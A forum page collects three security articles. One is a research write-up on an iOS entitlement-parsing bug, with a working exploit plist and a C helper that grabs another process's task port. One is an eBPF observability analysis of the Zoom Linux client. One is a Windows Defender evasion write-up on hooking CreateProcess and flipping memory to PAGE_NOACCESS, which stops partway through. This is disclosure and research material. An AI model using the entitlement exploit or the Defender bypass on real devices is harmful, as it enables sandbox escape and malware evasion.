The lion’s share of the work here is done by these two functions though, from iokit/Kernel/IOUserClient.cpp:

OSDictionary*
IOUserClient::copyClientEntitlements(task_t task)
{
#define MAX_ENTITLEMENTS_LEN    (128 * 1024)

    proc_t p = NULL;
    pid_t pid = 0;
    size_t len = 0;
    void *entitlements_blob = NULL;
    char *entitlements_data = NULL;
    OSObject *entitlements_obj = NULL;
    OSDictionary *entitlements = NULL;
    OSString *errorString = NULL;

    p = (proc_t)get_bsdtask_info(task);
    if (p == NULL) {
        goto fail;
    }
    pid = proc_pid(p);

    if (cs_entitlements_dictionary_copy(p, (void **)&entitlements) == 0) {
        if (entitlements) {
            return entitlements;
        }
    }

    if (cs_entitlements_blob_get(p, &entitlements_blob, &len) != 0) {
        goto fail;
    }

    if (len <= offsetof(CS_GenericBlob, data)) {
        goto fail;
    }

    /*
     * Per <rdar://problem/11593877>, enforce a limit on the amount of XML
     * we'll try to parse in the kernel.
     */
    len -= offsetof(CS_GenericBlob, data);
    if (len > MAX_ENTITLEMENTS_LEN) {
        IOLog("failed to parse entitlements for %s[%u]: %lu bytes of entitlements exceeds maximum of %u\n", proc_best_name(p), pid, len, MAX_ENTITLEMENTS_LEN);
        goto fail;
    }

    /*
     * OSUnserializeXML() expects a nul-terminated string, but that isn't
     * what is stored in the entitlements blob. Copy the string and
     * terminate it.
     */
    entitlements_data = (char *)IOMalloc(len + 1);
    if (entitlements_data == NULL) {
        goto fail;
    }
    memcpy(entitlements_data, ((CS_GenericBlob *)entitlements_blob)->data, len);
    entitlements_data[len] = '\0';

    entitlements_obj = OSUnserializeXML(entitlements_data, len + 1, &errorString);
    if (errorString != NULL) {
        IOLog("failed to parse entitlements for %s[%u]: %s\n", proc_best_name(p), pid, errorString->getCStringNoCopy());
        goto fail;
    }
    if (entitlements_obj == NULL) {
        goto fail;
    }

    entitlements = OSDynamicCast(OSDictionary, entitlements_obj);
    if (entitlements == NULL) {
        goto fail;
    }
    entitlements_obj = NULL;

fail:
    if (entitlements_data != NULL) {
        IOFree(entitlements_data, len + 1);
    }
    if (entitlements_obj != NULL) {
        entitlements_obj->release();
    }
    if (errorString != NULL) {
        errorString->release();
    }

    return entitlements;
}

OSObject*
IOUserClient::copyClientEntitlement(task_t task, const char * entitlement)
{
    OSDictionary *entitlements;
    OSObject *value;

    entitlements = copyClientEntitlements(task);
    if (entitlements == NULL) {
        return NULL;
    }

    /* Fetch the entitlement value from the dictionary. */
    value = entitlements->getObject(entitlement);
    if (value != NULL) {
        value->retain();
    }

    entitlements->release();

    return value;
}

So we have a reference implementation for entitlement checks, and it’s backed by OSUnserializeXML. Great!

…or is it?

A very interesting thing about this bug is that I couldn’t point you at any particular piece of code and say “there’s my bug”. The reason for that is that, of course, iOS doesn’t have just one, or two, or even three plist parsers, it has at least four! These are:

OSUnserializeXML in the kernel
IOCFUnserialize in IOKitUser
CFPropertyListCreateWithData in CoreFoundation
xpc_create_from_plist in libxpc (closed-source)

So the three interesting questions that arise from this are:

1) Which parsers are used to parse entitlements?
2) Which parser does amfid use?
3) Do all parsers return the same data?
The answer to 1) is “all of them”, and to 2) CFPropertyListCreateWithData. And as a few folks on Twitter already figured out after my tweet, the answer to 3) is obviously “lolnope”. Because XML is so hard to parse correctly, valid XML makes all parsers return the same data, but slightly invalid XML makes them return slightly different data. In other words, any parser difference can be exploited to make different parsers see different things. This is the very heart of this bug, making it not just a logic flaw, but a system-spanning design flaw.

Before we move on to exploiting this, I would like to note that in all my tests, OSUnserializeXML and IOCFUnserialize always returned the same data, so for the rest of this post I will consider them as equivalent. For brevity, I will also be dubbing OSUnserializeXML/IOCFUnserialize “IOKit”, CFPropertyListCreateWithData “CF”, and xpc_create_from_plist “XPC”.

3. The exploit

Let’s start with the variant of the PoC I tweeted out, which is perhaps the most elegant way of exploiting this bug:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <!-- these aren't the droids you're looking for -->
    <!---><!-->
    <key>platform-application</key>
    <true/>
    <key>com.apple.private.security.no-container</key>
    <true/>
    <key>task_for_pid-allow</key>
    <true/>
    <!-- -->
</dict>
</plist>

The interesting tokens here are <!---> and <!-->, which, as per my understanding of the XML specification, are not valid XML tokens. Nonetheless, IOKit, CF and XPC all accept the above XML/plist… just not exactly in the same way. I wrote a little tool called plparse that I have so far been reluctant to open-source, because it emphasises the fact that there exist multiple plist parsers in iOS, and that they certainly don’t all work the same.
It takes an input file and any combination of -c, -i and -x args to parse the file with the CF, IOKit and XPC engines respectively. Running it on the above file, we get:

% plparse -cix ent.plist
{
}
{
    task_for_pid-allow: true,
    platform-application: true,
    com.apple.private.security.no-container: true,
}
{
    com.apple.private.security.no-container: true,
    platform-application: true,
    task_for_pid-allow: true,
}

The output is a lazy JSON-like format, but you get the gist of it. At the top is CF, followed by IOKit, and finally XPC. This means that when we slap the above entitlements file on our app (plus the app identifier that we need and such) and amfid uses CF to check whether we have any entitlements that the provisioning profile doesn’t allow, it doesn’t see any. But then when the kernel or some daemon wants to check whether we’re allowed to do Fun Stuff™, they see we have all the permissions for it!

So how does this specific example work? This is the comment tag handling code of CF (the relevant one anyway, there are multiple):

case '!': // Could be a comment
    if (pInfo->curr+2 >= pInfo->end) {
        pInfo->error = __CFPropertyListCreateError(kCFPropertyListReadCorruptError, CFSTR("Encountered unexpected EOF"));
        return false;
    }
    if (*(pInfo->curr+1) == '-' && *(pInfo->curr+2) == '-') {
        pInfo->curr += 2;
        skipXMLComment(pInfo);
    } else {
        pInfo->error = __CFPropertyListCreateError(kCFPropertyListReadCorruptError, CFSTR("Encountered unexpected EOF"));
        return false;
    }
    break;
// ...
static void skipXMLComment(_CFXMLPlistParseInfo *pInfo) {
    const char *p = pInfo->curr;
    const char *end = pInfo->end - 3; // Need at least 3 characters to compare against
    while (p < end) {
        if (*p == '-' && *(p+1) == '-' && *(p+2) == '>') {
            pInfo->curr = p+3;
            return;
        }
        p ++;
    }
    pInfo->error = __CFPropertyListCreateError(kCFPropertyListReadCorruptError, CFSTR("Unterminated comment started on line %d"), lineNumber(pInfo));
}

And this is the comment tag handling code of IOKit:

if (c == '!') {
    c = nextChar();
    bool isComment = (c == '-') && ((c = nextChar()) != 0) && (c == '-');
    if (!isComment && !isAlpha(c)) {
        return TAG_BAD; // <!1, <!-A, <!eos
    }
    while (c && (c = nextChar()) != 0) {
        if (c == '\n') {
            state->lineNumber++;
        }
        if (isComment) {
            if (c != '-') {
                continue;
            }
            c = nextChar();
            if (c != '-') {
                continue;
            }
            c = nextChar();
        }
        if (c == '>') {
            (void)nextChar();
            return TAG_IGNORE;
        }
        if (isComment) {
            break;
        }
    }
    return TAG_BAD;
}

As can be seen, IOKit checks for the !-- chars, and then correctly advances the pointer by three chars before seeing ->, which doesn’t end the comment. CF on the other hand only advances the pointer by two chars, so it parses the second - twice, thus seeing both <!-- and -->. This means that while IOKit considers <!---> as just the start of a comment, CF considers it as both start and end. After that, we feed both parsers the <!--> token, which is now too short to be interpreted as a full comment by either of them. However, the difference in states (in a comment vs. not in a comment) causes a very interesting behaviour: if we’re currently inside a comment, both parsers see the --> ending a comment, otherwise they both just see the <!-- starting one. Overall, this means:

<!--->     <- CF sees these bits
<!-->      <- IOKit sees these bits
<!-- -->

After discovering this, I didn’t bother reversing XPC, I simply fed it some test data and observed the results. In this case, it turned out to see the same things as IOKit, which was perfect for my case.
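To make the divergence tangible, here is a toy model of just the comment scanning (our own simplification, not the real code): the single behavioural difference is whether the search for --> may reuse the second dash of the opening <!--.

```python
def visible_text(doc, reuse_dash):
    # reuse_dash=True mimics CF (the second '-' of "<!--" can double as the
    # start of "-->"); False mimics IOKit/XPC (the scan for "-->" begins only
    # after the full "<!--").
    out, i = [], 0
    while i < len(doc):
        if doc.startswith('<!--', i):
            end = doc.find('-->', (i + 3) if reuse_dash else (i + 4))
            if end == -1:
                break  # unterminated comment swallows the rest
            i = end + 3
        else:
            out.append(doc[i])
            i += 1
    return ''.join(out)

doc = '<!---><!--> <key>task_for_pid-allow</key><true/> <!-- -->'
print(repr(visible_text(doc, reuse_dash=True)))   # CF-style: entitlement hidden
print(repr(visible_text(doc, reuse_dash=False)))  # IOKit-style: entitlement visible
```

The same bytes yield an empty document to the CF-style scanner and a fully visible entitlement to the IOKit-style one - exactly the effect plparse showed above.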
I could sneak entitlements past amfid using CF, but have them show up when parsed by both IOKit and XPC! There are a couple more variants I tested, with varying results:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict hurr=">
</dict>
</plist>
">
<key>task_for_pid-allow</key>
<true/>
</dict>
</plist>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<???><!-- ?>
<key>task_for_pid-allow</key>
<true/>
<!-- -->
</dict>
</plist>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE [%>
<plist version="1.0">
<dict>
<key>task_for_pid-allow</key>
<true/>
</dict>
</plist>
;]>
<plist version="1.0">
<dict>
</dict>
</plist>

These are all less elegant and less rewarding than the first variant, and I’ll leave it as an exercise to the reader to figure out what parser difference causes those, or how the different parsers react to them. One thing to note here though is that, depending on what you use to install IPA files on your iDevice, getting these entitlements to survive that process can be tricky. That is because the entitlements on a provisioned app also contain a team and app identifier, which at least Cydia Impactor generates randomly every time you sign, and thus has to parse, modify and re-generate the entitlements blob. I don’t know about any of its alternatives, but I’ve been told Xcode works fine with such entitlements, and the manual variant of codesign+ideviceinstaller certainly does as well.

4. Escaping the sandbox

From this point forward, it’s simply a matter of picking entitlements.
For a start, we can give ourselves the three entitlements in my initial PoC:

com.apple.private.security.no-container - This prevents the sandbox from applying any profile to our process whatsoever, meaning we can now read from and write to any location the mobile user has access to, execute a ton of syscalls, and talk to many hundreds of drivers and userland services that we previously weren’t allowed to. And as far as user data goes, security no longer exists.
task_for_pid-allow - Just in case the file system wasn’t enough, this allows us to look up the task port of any process running as mobile, which we can then use to read and write process memory, or directly get or set thread register states.
platform-application - Normally we would be marked as a non-Apple binary and not be allowed to perform the above operations on task ports of Apple binaries, but this entitlement marks us as a genuine, mint-condition Cupertino Cookie.

And just in case this entitlement magic wasn’t enough, say we needed to pretend to CF that we have certain entitlements as well, we could easily do that with the three above ones now. All we have to do is find a binary that holds the entitlement(s) we want, posix_spawn it in a suspended state, get the newly created process’ task port, and make it do our bidding:

task_t haxx(const char *path_of_executable)
{
    task_t task;
    pid_t pid;
    posix_spawnattr_t att;
    posix_spawnattr_init(&att);
    posix_spawnattr_setflags(&att, POSIX_SPAWN_START_SUSPENDED);

    posix_spawn(&pid, path_of_executable, NULL, &att, (const char*[]){ path_of_executable, NULL }, (const char*[]){ NULL });
    posix_spawnattr_destroy(&att);

    task_for_pid(mach_task_self(), pid, &task);
    return task;
}

You can further get some JIT entitlements to dynamically load or generate code, you can spawn a shell, or any of literally a thousand other things. There are a mere two privileges this bug does not give us: root and kernel.
But for both of those, our available attack surfaces just increased a hundredfold, and I would argue that going to root isn’t even worth it, because you might as well go straight for the kernel. But I hope you will understand, dear reader, that losing one 0day is loss enough for me, so of course escalating past “mobile with every entitlement ever” is left as an exercise to you.

5. The patch

Given the elusive nature of this bug, how did Apple ultimately patch it? Obviously there could only be one way: by introducing MORE PLIST PARSERS!!!one!

In iOS 13.4 already, Apple hardened entitlement checks somewhat, due to a bug report credited to Linus Henze:

AppleMobileFileIntegrity
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation
Impact: An application may be able to use arbitrary entitlements
Description: This issue was addressed with improved checks.
CVE-2020-3883: Linus Henze (pinauten.de)

While I don’t know the exact details of that bug, based on a tweet of Linus’ I’m assuming it had to do with bplist, which, while also exploiting parser differences, wouldn’t have gotten past amfid. And my bug actually survived the 13.4 fix, but was finally killed in 13.5 beta 3. I also don’t know whether it was Linus, Apple or someone else who went on to look for more parser differences, but having two entitlement bugs fixed in two consecutive minor iOS releases feels like too much of a coincidence, so I’m strongly assuming whoever it was drew inspiration from Linus’ bug.

Apple’s final fix consists of introducing a new function called AMFIUnserializeXML, which is pasted into both AMFI.kext and amfid, and is used to compare against the results of OSUnserializeXML and CFPropertyListCreateWithData to make sure they are the same.
You can still include a sequence like <!---><!--><!-- --> in your entitlements and it will go through, but try and sneak anything in between those comments, and AMFI will tear your process to shreds and report to syslog:

AMFI: detected an anomaly during entitlement parsing.

So while this does technically bump the number of XML/plist parsers from 4 to 6, it does sadly actually mitigate my bug.

6. Conclusion

As far as first 0days go, I couldn’t have wished for a better one. This single bug has assisted me in dozens of research projects, was used thousands of times every year, and has probably saved me just as many hours. And the exploit for it is in all likelihood the most reliable, clean and elegant one I’ll ever write in my entire life. And it even fits in a tweet!! Well over 3 years since discovery is not half bad for such a bug, but I sure would’ve loved to keep it another decade or two, and I know I’ll dearly miss it in the time to come.

We can also ask ourselves how a bug like that could ever exist. Why the hell there are 4 different plist parsers on iOS. Why we are still using XML, even. But I figure those are more philosophical than technical in nature. And while this entire story shows that it might be a good idea to periodically ask ourselves whether the inaccuracies of our mental models are acceptable, or something should be documented and communicated more thoroughly, I really can’t accuse Apple of much here. Bugs like these are probably among the hardest to spot, and I have truly no idea how the hell I was able to find it while so many others didn’t.

Now, I’ve pumped this post out as soon as I possibly could, so if I’ve left any mistake in here, you have any questions, or just wanna chat in general, feel free to file an issue, hit me up on Twitter, or shoot me an email at *@*.net where * = siguza. At the time of writing, this bug is still present on the latest non-beta version of iOS.
The whole project is available on GitHub, have fun with it while it lasts! And finally, some of the reactions I got off Twitter for all of you to enjoy:

Sursa: https://siguza.github.io/psychicpaper/
-
Zooming in on Observability

by Peter Parkanyi, MAY 1, 2020
FILED UNDER: CORONAVIRUS CYBERSECURITY LABS WORK @ RED SIFT

Zoom has been under scrutiny lately, for a lot of good reasons. Since their product has quickly escalated to being a public critical infrastructure, we decided to play around with our observability stack to see how the Zoom Linux client actually works, and how the different pieces help us with analysis. This write-up is about using eBPF for research and blackbox testing, and provides hands-on examples using ingraind and RedBPF. Our intent was to see how far we can push eBPF in this domain, while also demonstrating some of the amazing engineering behind Zoom.

ingraind and RedBPF

At Red Sift, we developed ingraind, our security observability agent for our cloud, based on Rust and eBPF using RedBPF. This means we can gather run-time information about arbitrary system processes and containers to validate whether they are doing anything nefarious in our cloud, who they talk to, and which files they access. However, the cloud is just a fancy word for someone else’s computer, and ingraind runs perfectly fine on my laptop, too. So we fired up ingraind to monitor our daily Zoom “standup” meeting, and decided to analyse the results in this blog post. We then deviated a little, and ended up writing some Rust code that helps us decrypt TLS traffic by instrumenting the binary using eBPF uprobes. Let’s dig in: first a look at the binary, then the results. At the end of the post, I share the configuration file that I used.

First look

To get a basic idea of what to expect, I looked at the zoom binary using strings, and quickly found some pinned certificates for *.zoomgov.com, *.zoom.us, and mentions of xmpp.zoomgov.com. This is great! The binary is stripped; however, some debug symbols are there for the dependency libraries, though not for the proprietary code. The directory also contains the Qt library, and a few other standard open source bits and pieces.
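That strings pass boils down to pulling printable runs out of the binary; a minimal Python equivalent is below (the sample blob is fabricated for illustration - in the real binary, those hostnames simply appear among thousands of other printable strings):

```python
import re

def strings(data, min_len=6):
    """Return runs of at least min_len printable ASCII bytes, like strings(1)."""
    return re.findall(rb'[\x20-\x7e]{%d,}' % min_len, data)

blob = b'\x00\x01*.zoom.us\x00junk\xffxmpp.zoomgov.com\x00'
hits = [s for s in strings(blob) if b'zoom' in s]
print(hits)  # [b'*.zoom.us', b'xmpp.zoomgov.com']
```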
Interestingly, the package comes with a wrapper shell script, zoom.sh, that manages core dumps.

Network traffic analysis

The most interesting thing I wanted to see was how Zoom handles network traffic. I expected at least a partially peer-to-peer setup with many participants; instead I found that only a handful of IP ranges were used during any call. Most interestingly, one call about two weeks ago showed some amount of TCP traffic hitting a broadcast IP address that ends with .255. My recent tests showed a larger number of individual IPs within a few different IP blocks, but the client version was the same. This is how I found out that Zoom actually operates their own ISP, which strikes me as an ingenious way of managing the amount of traffic they have to deal with. Zoom reaches out to Google’s CDN to fetch the profile images for users who are logged in with Google’s SSO. I suspect the same is true for participants who use Facebook logins, but I didn’t see any activity towards Facebook’s ranges. Another thing that’s interesting to see is that there is a dedicated thread for networking. I can only hope that this means there is at least some sort of privilege separation, but I did not do syscall analysis this time.

File access patterns

The list of files Zoom touched during my call was nothing surprising. Apart from the usual X libraries and the dependencies they ship, they maintain a local configuration file, and access PulseAudio-related resources on the file system. Stripping out the boring bits leaves us with this:

$ rg '"process_str":"zoom.*"' zoom_file.log |jq '.tags.path_str' |sort |uniq
...
"etc/ca-certificates/extracted/tls-ca-bundle.pem"
...
"p2501/.config/zoomus.conf"
"p2501/.local/share/fonts/.uuid"
"p2501/.Xauthority"
"p2501/.zoom/data/conf_avatar_045a3a19053421428ff"
"p2501/.zoom/data/conf_avatar_763f5840c57564bca16"
"p2501/.zoom/data/conf_avatar_7cdb80036953ea86e83"
"p2501/.zoom/data/conf_avatar_9426e77c9128d50079d"
"p2501/.zoom/data/conf_avatar_aa2a71a3e0a424e451b"
"p2501/.zoom/data/conf_avatar_b46ff5ad22374cdd56d"
"p2501/.zoom/data/conf_avatar_b61879be31e3fce14ee"
"p2501/.zoom/data/conf_avatar_c29cc2bde8058cb0093"
"p2501/.zoom/data/conf_avatar_e3ef3d0218f29d518dd"
"p2501/.zoom/data/conf_avatar_e8dc9d76cae1c2a5f3e"
"p2501/.zoom/data/conf_avatar_ef7b17310c83f908b39"
"p2501/.zoom/data/conf_avatar_f26b44b634fceb21d7e"
"p2501/.zoom/data/conf_avatar_f28df485f9132b47c75"
"p2501/.zoom/data/zoommeeting.db"
"p2501/.zoom/data/zoomus.db"
"p2501/.zoom/data/zoomus.tmp.db"
...

The local cache of avatars is certainly a good call. As we’ve seen above, Zoom downloads the avatars from Google if the user is logged in through the single sign-on service, and it makes sense to maintain a local cache of these. The files are PNGs and JPEGs, and I have found pictures of people I do not recognise, so it looks like there’s no automatic cleanup. The local databases are more interesting. They are SQLite databases that seem to contain not much information at all. There is no local copy of conversations or chats. However, the access to the TLS CA bundle is a bit baffling given the pinned certificates in the binary, but I suspect one of the linked libraries might be auto-loading this store.

Accessing the unencrypted data

For this, we had to bring out the big guns, uprobes, so I’ll hand it over to Alessandro.

As discovered by Peter looking at the network connections logged by ingraind, Zoom uses Transport Layer Security (TLS) to secure some of its connections. There are several libraries that can be used by applications to implement TLS, including the popular OpenSSL, LibreSSL, BoringSSL, NSS etc.
Having recently implemented uprobes support for RedBPF, I thought it could be fun to try and use it to hook into whatever library Zoom uses to implement TLS and intercept the unencrypted data. Uprobes allow you to instrument user space code by attaching to arbitrary addresses inside a running program. I’m planning to talk about uprobes in a separate post; for the moment it suffices to know that the API to attach custom code to a running program is the following:

pub fn attach_uprobe(
    &mut self,
    fn_name: Option<&str>,
    offset: u64,
    target: &str,
    pid: Option<pid_t>,
) -> Result<()>;

attach_uprobe() parses the target binary or library, finds the function fn_name, and injects the BPF code at its address. If offset is not zero, its value is added to the address of fn_name. If fn_name is None, offset is interpreted as an offset from the start of the target’s .text section. Finally, if a pid is given, the custom code will only run for the target loaded by the program with the given pid. While doing this is certainly possible on a running process, it is a bit of a rabbit hole. Instrumenting Zoom to access decrypted data turned out to be a challenge, but ad-hoc attaching to existing processes within your control should be easily possible using this infrastructure.

Findings

Based on the data we’ve been able to collect with ingraind, there are no screaming issues we’ve found. It is certainly good to see that the Zoom app uses pinned certificates, and that they do not keep logs of the messaging history, even as a side-effect. Using a Qt-based app is a great way to balance performance and security for a cross-platform audience. On top of that, it was really interesting to see how the infrastructure works in action, with connections going to over 100 target IPs in a few blocks during a single call, being routed through Zoom’s ISP. I highlighted that they keep a cache of profile pictures from Google accounts.
This seems futile, as Zoom hits Google’s CDN whenever somebody with a Google account joins.

Test setup

To make sure we were looking at the right traffic and only picked up on Zoom’s DNS queries, I made sure that nothing else was running during the call but the Zoom Linux client. We used the following ingraind config to monitor the system during a Zoom call.

[[probe]]
pipelines = ["console"]
[probe.config]
type = "Network"

[[probe]]
pipelines = ["console"]
[probe.config]
type = "DNS"
interface = "wlp61s0"

[[probe]]
pipelines = ["console"]
[probe.config]
type = "Files"
monitor_dirs = ["/usr/bin"]

[[probe]]
pipelines = ["console"]
[probe.config]
type = "TLS"
interface = "wlp61s0"

[[pipeline.console.steps]]
type = "Container"

[[pipeline.console.steps]]
type = "Buffer"
interval_s = 1
enable_histograms = false

[pipeline.console.config]
backend = "Console"

Using this config, we can redirect all the output into a file and use command line tools like ripgrep and jq to process the results for a superficial look. Let’s take a look at the config file piece by piece.

[probe.config]
type = "Network"

The Network probe enables network traffic analysis. This means we get low-level information on every read and write on a network socket, whether TCP, UDP, v4 or v6.

[probe.config]
type = "DNS"
interface = "wlp61s0"

The DNS probe collects incoming DNS traffic data. Incoming DNS traffic also includes DNS answers, so we will know exactly what our queries are and what they resolve to, even if an application chooses to craft the packets itself and bypass the gethostbyname(3) libc call. Due to an implementation detail, we need to specify the network interface, which, using systemd, looks a bit ugly.

[probe.config]
type = "Files"
monitor_dirs = ["/"]

The file probe gives us information about file read/write events that happen in a directory. For monitoring Zoom, I decided I want to see all filesystem activity, so anything that happens under / will show up in my logs.
Most applications tend to show fairly conservative access patterns after the loader caters for all the dynamic dependencies, and this is what I expect here, too.

[probe.config]
type = "TLS"
interface = "wlp61s0"

I want to see the details of TLS connections. Since we know Zoom uses certificate pinning, it will be interesting to see the properties and cipher suites the connections actually use.

[[pipeline.console.steps]]
type = "Container"

This is a long shot, but we would be able to pick up cgroup information using the Container post-processor. I didn’t pick up any cgroup information, though, so there’s no network-facing sandbox.

[[pipeline.console.steps]]
type = "Buffer"
interval_s = 1
enable_histograms = false

[pipeline.console.config]
backend = "Console"

And finally, aggregate events every second to reduce the amount of data we have to analyse, then print it to the console. Enabling aggregation is a good idea if you want to load the results into your preferred analytics stack as I did, because a raw event dump gets very large very quickly.

Conclusion

This was a quick-ish and fun exercise to see how far we can push our tools in security research. It’s great seeing the amount of effort the community puts into securing critical infrastructure, and in these unprecedented times, privacy and security of video conferencing is definitely at the top of the list as companies are still figuring out how to transition to more sustainable remote environments. More importantly, it shows that programs are just programs; it doesn’t matter whether we call them containers or desktop applications, the same methodology applies to monitoring them. A large benefit of deploying an observability layer that doesn’t require opt-in from the applications is the immediate increase in coverage, whether it’s for tracing or security-related work.
The layers of data can be aggregated using ingraind’s powerful tagging system, which allows in-depth analysis across the different abstraction layers that make up the environment. If you’d like to find out more information about ingraind, visit our information page below. Happy hacking in your sandboxes! Sursa: https://blog.redsift.com/labs/zooming-in-on-observability/
-
Resources-for-Beginner-Bug-Bounty-Hunters

Intro

There are a number of new hackers joining the community on a regular basis, and more often than not the first thing they ask is "How do I get started and what are some good resources?". As a hacker, there are a ton of techniques, terminologies, and topics you need to familiarize yourself with to understand how an application works. Cody Brocious (@daeken), @0xAshFox, and I put these resources together in order to help new hackers learn the basics of Web Application Security. We understand that there are more resources than the ones we have listed, and we hope to cover more in the near future!

Current Version: 2020.05

Changelog: See what's new!

Table of Contents

Basics
Setup
Tools
Labs & Testing Environments
Vulnerability Types
Mobile Hacking
Smart Contracts
Coding & Scripting
Hardware & IoT
Blog posts & Talks
Media Resources
Certifications
Mindset & Mental Health

If you have more questions or suggestions, come join nahamsec's Discord server!

Sursa: https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
-
-
-
-
Bypassing Windows Defender Runtime Scanning

Charalampos Billinis, 1 May 2020

Introduction

Windows Defender is enabled by default in all modern versions of Windows, making it an important mitigation for defenders and a potential target for attackers. While Defender has significantly improved in recent years, it still relies on age-old AV techniques that are often trivial to bypass. In this post we’ll analyse some of those techniques and examine potential ways they can be bypassed.

Antivirus 101

Before diving into Windows Defender we wanted to quickly introduce the main analysis methods used by most modern AV engines:

Static Analysis – Involves scanning the contents of a file on disk and primarily relies on a set of known bad signatures. While this is effective against known malware, static signatures are often easy to bypass, meaning new malware is missed. A newer variation of this technique is machine-learning-based file classification, which essentially compares static features against known good and bad profiles to detect anomalous files.

Process Memory/Runtime Analysis – Similar to static analysis, except running process memory is analysed instead of files on disk. This can be more challenging for attackers as it can be harder to obfuscate code in memory as it's executing, and off-the-shelf payloads are easily detected.

It’s also worth mentioning how scans can be triggered:

File Read/Write – Whenever a new file is created or modified this can potentially trigger the AV and cause it to initiate a scan of the file.

Periodic – AV will periodically scan systems; daily or weekly scans are common and this can involve all or just a subset of the files on the system. This concept also applies to scanning the memory of running processes.

Suspicious Behaviour – AV will often monitor for suspicious behaviour (usually API calls) and use this to trigger a scan; again, this could be of local files or process memory.
In the next few sections we’ll discuss potential bypass techniques in more detail.

Bypassing Static Analysis With a Custom Crypter

One of the most well-documented and easiest ways to bypass static analysis is to encrypt your payload and decrypt it upon execution. This works by creating a unique payload every time, rendering static file signatures ineffective. There are multiple open source projects which demonstrate this (Veil, Hyperion, PE-Crypter etc.), however we also wanted to test memory injection techniques, so we wrote a custom crypter to incorporate them in the same payload. The crypter would take a “stub“ to decrypt, load and execute our payload, and the malicious payload itself. Passing these through our crypter would combine them together into our final payload, which we can execute on our target. The proof of concept we created included support for a number of different injection techniques that are useful to test against AVs, including local/remote shellcode injection, process hollowing and reflective loading. Parameters for these techniques were passed in the stub options. All of the above techniques were able to bypass Windows Defender’s static file scan when using a standard Metasploit Meterpreter payload. However, despite execution succeeding, we found that Windows Defender would still kill the Meterpreter session when commands such as shell/execute were used. But why?

Analysing Runtime Analysis

As mentioned earlier in this post, memory scanning can be periodic or “triggered” by specific activity. Given that our Meterpreter session was only killed when shell/execute was used, it seemed likely this activity was triggering a scan. To try and understand this behaviour we examined the Metasploit source code and found that Meterpreter used the CreateProcess API to launch new processes.
```cpp
// Try to execute the process
if (!CreateProcess(NULL, commandLine, NULL, NULL, inherit, createFlags,
        NULL, NULL, (STARTUPINFOA*)&si, &pi))
{
    result = GetLastError();
    break;
}
```

Inspecting the arguments of CreateProcess and the code around it, we could find nothing suspicious. Debugging and stepping through the code also didn’t reveal any userland hooks, but once the underlying syscall was executed, Windows Defender would find and kill the Meterpreter session. This suggested that Windows Defender was logging activity from the kernel and would trigger a scan of process memory when specific APIs were called. To validate this hypothesis we wrote some custom code to call potentially suspicious API functions and then measure whether Windows Defender was triggered and would kill the Meterpreter session.

```cpp
VOID detectMe()
{
    std::vector<BOOL(*)()>* funcs = new std::vector<BOOL(*)()>();
    funcs->push_back(virtualAllocEx);
    funcs->push_back(loadLibrary);
    funcs->push_back(createRemoteThread);
    funcs->push_back(openProcess);
    funcs->push_back(writeProcessMemory);
    funcs->push_back(openProcessToken);
    funcs->push_back(openProcess2);
    funcs->push_back(createRemoteThreadSuspended);
    funcs->push_back(createEvent);
    funcs->push_back(duplicateHandle);
    funcs->push_back(createProcess);

    for (int i = 0; i < funcs->size(); i++) {
        printf("[!] Executing func at index %d ", i);
        if (!funcs->at(i)()) {
            printf(" Failed, %d", GetLastError());
        }
        Sleep(7000);
        printf(" Passed OK!\n");
    }
}
```

Interestingly, most test functions did not trigger a scan event; only CreateProcess and CreateRemoteThread resulted in a scan being triggered. This perhaps made sense: many of the APIs tested are frequently used, and if a scan was triggered every time one of them was called, Windows Defender would be constantly scanning and might impact system performance.
Bypassing Windows Defender’s Runtime Analysis

After confirming Windows Defender memory scanning was being triggered by specific APIs, the next question was how can we bypass it? One simple approach would be to avoid the APIs that trigger Windows Defender’s runtime scanner, but that would mean manually rewriting Metasploit payloads, which is far too much effort. Another option would be to obfuscate the code in memory, either by adding/modifying instructions or dynamically encrypting/decrypting our payload in memory when a scan is detected. But is there another way? Well, one thing that works in an attacker’s favour is that the virtual memory space of processes is huge: 2 GB on 32-bit and 128 TB on 64-bit systems. As such, AVs won’t typically scan the whole virtual memory space of a process and instead look for specific page allocations or permissions, for example MEM_PRIVATE or RWX page permissions. Reading through the Microsoft documentation though, you’ll see one permission in particular that is quite interesting for us: PAGE_NOACCESS. This “Disables all access to the committed region of pages. An attempt to read from, write to, or execute the committed region results in an access violation”, which is exactly the kind of behaviour we are looking for. And quick tests confirmed that Windows Defender would not scan pages with this permission. Awesome, we have a potential bypass! To weaponize this we’d just need to dynamically set PAGE_NOACCESS memory permissions whenever a suspicious API was called (as that would trigger a scan), then revert them back once the scan is done. The only tricky bit here is we’d need to add hooks for any suspicious calls to make sure we can set permissions before the scan is triggered.
Bringing this all together, we’d need to:

1. Install hooks to detect when a Windows Defender trigger function (CreateProcess) is called
2. When CreateProcess is called, the hook is triggered and the Meterpreter thread is suspended
3. Set payload memory permissions to PAGE_NOACCESS
4. Wait for the scan to finish
5. Set permissions back to RWX
6. Resume the thread and continue execution

We’ll walk through the code for this in the next section.

Digging into the hooking code

We started by creating a function installHook which would take the address of CreateProcess as well as the address of our hook as input, then update one with the other.

```cpp
CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle(L"KERNELBASE.dll"), "CreateProcessInternalW");
CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "CreateProcessInternalW");
hookResult = installHook(CreateProcessInternalW, hookCreateProcessInternalW, 5);
```

Inside the installHook function you’ll see we save the current state of the memory, then replace the memory at the CreateProcess address with a JMP instruction to our hook, so that when CreateProcess is called our code will be called instead. A restoreHook function was also created to do the reverse.
```cpp
